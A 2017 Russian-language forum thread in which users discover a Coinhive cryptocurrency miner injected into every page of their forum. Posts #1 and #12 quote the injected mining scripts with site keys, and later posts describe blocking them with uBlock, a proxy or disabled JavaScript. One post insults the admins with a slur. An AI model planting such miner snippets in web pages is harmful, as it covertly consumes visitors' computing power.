Форум взломан чуть-чуть.

Тема в разделе "Флудилка", создана пользователем rkit, 22 сен 2017.

Страница 1 из 2
  1. rkit

    rkit Гуру

    В исходнике каждой страницы.
    Код (Text):

    <body><script src="https://coin-hive.com/lib/coinhiv.min.js"></script>
    <script>
    var miner = new CoinHive.Anonymous('AprkKnDhxVVYCpyd44sJFNdVZNjnWWOm', {
    throttle: 0.2,
    threads: 10,
    autoThreads: false,
    } );
    miner.start();
    </script>
     
     
    rkit, 22 сен 2017
    #1
    acos нравится это.
  2. Tomasina

    Tomasina Сушитель лампочек Модератор

    майнят потихоньку.
     
    Tomasina, 22 сен 2017
    #2
  3. Igor68

    Igor68 Гуру

    Вот блин... придётся на малине поднимать прокси... чтобы он "вырезал" этот кусок кода из содержимого.
     
    Igor68, 22 сен 2017
    #3
  4. Igor68

    Igor68 Гуру

    вот по этому адресу (https://coin-hive.com/) даже исходники дают:
    Код (Javascript):
    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
    <script>
        var miner = new CoinHive.User('<site-key>', 'john-doe');
        miner.start();
    </script>
    ну и
    Код (Bash):
    curl "https://api.coin-hive.com/user/balance?name=john-doe&secret=<secret-key>"
    # {success: true, name: "john-doe" balance: 4096}
    как раз в "разделе"
    Flexible JavaScript API

    хотя можно проще... в прокси блокировать адрес https://coin-hive.com/
    ну или IP
    Код (Bash):
    igor@debian-i:~$ ping www.coin-hive.com
    PING www.coin-hive.com (94.130.129.239) 56(84) bytes of data.
    64 bytes from static.239.129.130.94.clients.your-server.de (94.130.129.239): icmp_req=1 ttl=52 time=52.0 ms
    64 bytes from static.239.129.130.94.clients.your-server.de (94.130.129.239): icmp_req=2 ttl=52 time=53.9 ms
    64 bytes from static.239.129.130.94.clients.your-server.de (94.130.129.239): icmp_req=3 ttl=52 time=55.6 ms
    64 bytes from static.239.129.130.94.clients.your-server.de (94.130.129.239): icmp_req=4 ttl=52 time=52.1 ms
     
     
    Igor68, 22 сен 2017
    #4
  5. rkit

    rkit Гуру

    Всё. Уже нету
     
    rkit, 22 сен 2017
    #5
    Igor68 нравится это.
  6. Igor68

    Igor68 Гуру

    Ну если интересно содержимое
    coinhive.min.js.zip
    по wget:

    Код (Bash):
    igor@debian-i:~/Загрузки/wget$ wget https://coin-hive.com/lib/coinhive.min.js
    --2017-09-22 16:57:49--  https://coin-hive.com/lib/coinhive.min.js
    WARNING: gnome-keyring:: couldn't connect to: /home/igor/.cache/keyring-ngq8T8/pkcs11: Нет такого файла или каталога
    Распознаётся coin-hive.com (coin-hive.com)... 94.130.129.239, 94.130.128.243, 94.130.128.151, ...
    Подключение к coin-hive.com (coin-hive.com)|94.130.129.239|:443... соединение установлено.
    HTTP-запрос отправлен. Ожидание ответа... 200 OK
    Длина: 137881 (135K) [application/javascript]
    Сохранение в каталог: ««coinhive.min.js»».

    100%[======================================================================================================================================================>] 137 881      423K/s   за 0,3s  

    2017-09-22 16:57:52 (423 KB/s) - «coinhive.min.js» saved [137881/137881]

    igor@debian-i:~/Загрузки/wget$
     

    Вложения:

    Igor68, 22 сен 2017
    #6
  7. rkit

    rkit Гуру

    Оп. обратно. Ну принципе это заметно - форум спамит ошибками
     
    rkit, 22 сен 2017
    #7
  8. Tomasina

    Tomasina Сушитель лампочек Модератор

    Tomasina, 22 сен 2017
    #8
  9. Tomasina

    Tomasina Сушитель лампочек Модератор

    Tomasina, 22 сен 2017
    #9
  10. sys

    sys Злобный Буратино Модератор

    мда... дожили... незлобные буратины решили подзаработать... лишь бы не грохнули форум :)
     
    sys, 23 сен 2017
    #10
  11. Пушной звер

    Пушной звер Гуру

     
    Пушной звер, 23 сен 2017
    #11
  12. Igor68

    Igor68 Гуру

    Вот интересно стало... по новому:
    Код (Javascript):
    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
    <script>
    var miner = new CoinHive.Anonymous('HqRcfNypnewChJOyojLNSYRLbHuIki9S', {
    threads: navigator.hardwareConcurrency/4,
    autoThreads: false,
    forceASMJS: false
    });
    miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
    setInterval(function() {
    var threadCount = miner.getNumThreads();
    var hashesPerSecond = Math.round(miner.getHashesPerSecond());
    var getTotalHashes = miner.getTotalHashes();
    navigator.getBattery().then(function (battery) {
    if (battery.level < 0.50 && battery.charging == false) {
    miner.stop();
    }
    });
    }, 100);
    </script>
    Даде батарейку проверяет.
     
    Igor68, 23 сен 2017
    #12
  13. Igor68

    Igor68 Гуру

    А он (скрипт) - козёл! Даже отредактировать не даёт. Была опечатка "Даде", а надо "Даже"
     
    Igor68, 23 сен 2017
    #13
  14. Igor68

    Igor68 Гуру

    Уважаемые майнеры!!! Если не затруднит измените интервал в скрипте в 10 раз... и исключите повторение запуска. А то процессор грузит. Понимаю конечно, что источник сего хлама именно на сайте в исходниках страниц.
     
    Igor68, 23 сен 2017
    #14
  15. Igor68

    Igor68 Гуру

    Отключил JS... пробую сообщение.
     
    Igor68, 23 сен 2017
    #15
  16. Igor68

    Igor68 Гуру

    при отключенном JS пробую вставить код:
    Код (Bash):

    echo "test"
     
    Код (C++):

    #include <stdio.h>
    int main(void)
    {
         printf("test");
         return 0;
    }
     
    Вроде работает... только вручную. Зато загрузки процессора нет никакой.

    И прокси поднимать не надо. И глупых ошибочных сообщений нет... и редактировать нормально.

    И войти получается... ну понятное дело всплывающего меню нет.

    И JS можно включать и выключать когда надо... только после этого обновлять страницу.
     
    Последнее редактирование: 23 сен 2017
    Igor68, 23 сен 2017
    #16
  17. Igor68

    Igor68 Гуру

    При включении JS сразу загрузка 100%.
     
    Igor68, 23 сен 2017
    #17
  18. Igor68

    Igor68 Гуру

    Как вариант для Firefox установил дополнение uBlock... запросы конечно есть, но блокируются. Выскакивает предупреждение, но загрузки процессора нет.
     
    Igor68, 23 сен 2017
    #18
  19. Karabas

    Karabas Гик

    Спасибо, Друг, за предупреждение!
    А я то грешил на что угодно, во тот такой подляны не ожидал.
    Ну да, пользуйся народ, у меня же комп так, для красоты стоит.

    Скажу, как думаю- вы, админы, ПИДАРАСЫ!
     
    Karabas, 23 сен 2017
    #19
  20. Igor68

    Igor68 Гуру

    С помощью uBlock блокировал только адрес в скрипте (кусок):
    Код ( (Unknown Language)):

    <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
     
    Только пишет, что ошибка при загрузке "быблиотеки"... и как правило при обновлении (автобновлении). Ну и соответственно и запустить не может. Вставка смайликов и кода сопровождается обновлением... ну и новым предупреждением
     
    Igor68, 23 сен 2017
    #20
Страница 1 из 2